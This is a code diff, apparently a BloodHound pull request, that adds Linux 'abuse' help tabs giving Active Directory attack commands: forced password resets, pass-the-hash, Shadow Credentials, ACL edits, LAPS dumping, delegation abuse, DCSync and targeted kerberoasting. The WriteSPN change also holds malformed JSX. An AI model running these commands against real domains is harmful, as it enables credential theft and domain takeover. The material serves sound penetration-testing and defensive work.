+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                    <p>
+                        Now that you know the target user's plain text password, you can
+                        either start a new agent as that user, or use that user's
+                        credentials in conjunction with PowerView's ACL abuse functions,
+                        or perhaps even RDP to a system the target user has access to.
+                        For more ideas and information, see the references tab.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            if (haslaps) {
+                return (
+                    <>
+                        <p>
+                            To change the ownership of the object, you may use Impacket's owneredit
+                            example script (cf. "grant ownership" reference for the exact link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            To abuse ownership of a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Retrieve LAPS Password </h4>
+
+                        <p>
+                            Full control of a computer object is abusable when
+                            the computer's local admin account credential is
+                            controlled with LAPS. The clear-text password for
+                            the local administrator account is stored in an
+                            extended attribute on the computer object called
+                            ms-Mcs-AdmPwd. With full control of the computer
+                            object, you may have the ability to read this
+                            attribute, or grant yourself the ability to read the
+                            attribute by modifying the computer object's
+                            security descriptor.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            } else {
+                return (
+                    <>
+                        <p>
+                            To change the ownership of the object, you may use Impacket's owneredit
+                            example script (cf. "grant ownership" reference for the exact link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            To abuse ownership of a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            }
+        case 'Domain':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        To abuse ownership of a domain object, you may grant
+                        yourself the DcSync privileges.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> DCSync </h4>
+
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
+
+                    <p>
+                        If FullControl (GenericAll) is obtained on the domain,
+                        instead of granting DCSync rights, the AllExtendedRights
+                        privilege included grants {sourceName} enough{' '}
+                        privileges to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        To abuse ownership of a GPO, you may
+                        grant yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                    Impacket's dacledit can be used for that purpose (cf.
+                    "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <p>
+                        With full control of a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With ownership of the OU object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'Container':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4>Control of the Container</h4>
+
+                    <p>
+                        With ownership of the container object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    targetId: PropTypes.string,
+    haslaps: PropTypes.bool,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/WriteOwner/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({
+const WindowsAbuse = ({
     sourceName,
     sourceType,
     targetName,
@@ -854,7 +854,7 @@ const Abuse = ({
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -862,4 +862,4 @@ Abuse.propTypes = {
     targetId: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/WriteOwner.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -23,8 +24,8 @@ const WriteOwner = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -32,10 +33,19 @@ const WriteOwner = ({
                     targetId={targetId}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    targetId={targetId}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteSPN/LinuxAbuse.jsx
@@ -1,0 +1,40 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                A targeted kerberoast attack can be performed using{' '}
+                <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                    }
+                </code>
+            </pre>
+
+            <p>
+                The tool will automatically attempt a targetedKerberoast
+                attack, either on all users or against a specific one if
+                specified in the command line, and then obtain a crackable hash.
+                The cleanup is done automatically as well.
+            </p>
+
+            <p>
+                The recovered hash can be cracked offline using the tool
+                of your choice.
+            </p>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/WriteSPN/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteSPN/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -58,9 +58,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx
+++ b/src/components/Modals/HelpTexts/WriteSPN/WriteSPN.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -17,13 +18,16 @@ const WriteSPN = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <Windows AbusesourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <Linux AbusesourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>


### PR DESCRIPTION
Adding abuse guidance from UNIX-like systems for many edges referring to the progress that has been made these last few years to support AD attacks from linux (e.g. mindmap at https://www.thehacker.recipes/ad/movement/dacl for the DACL abuse).

![image](https://user-images.githubusercontent.com/40902872/208489122-d45c0af4-474b-421a-bf2e-f8d82531a55f.png)

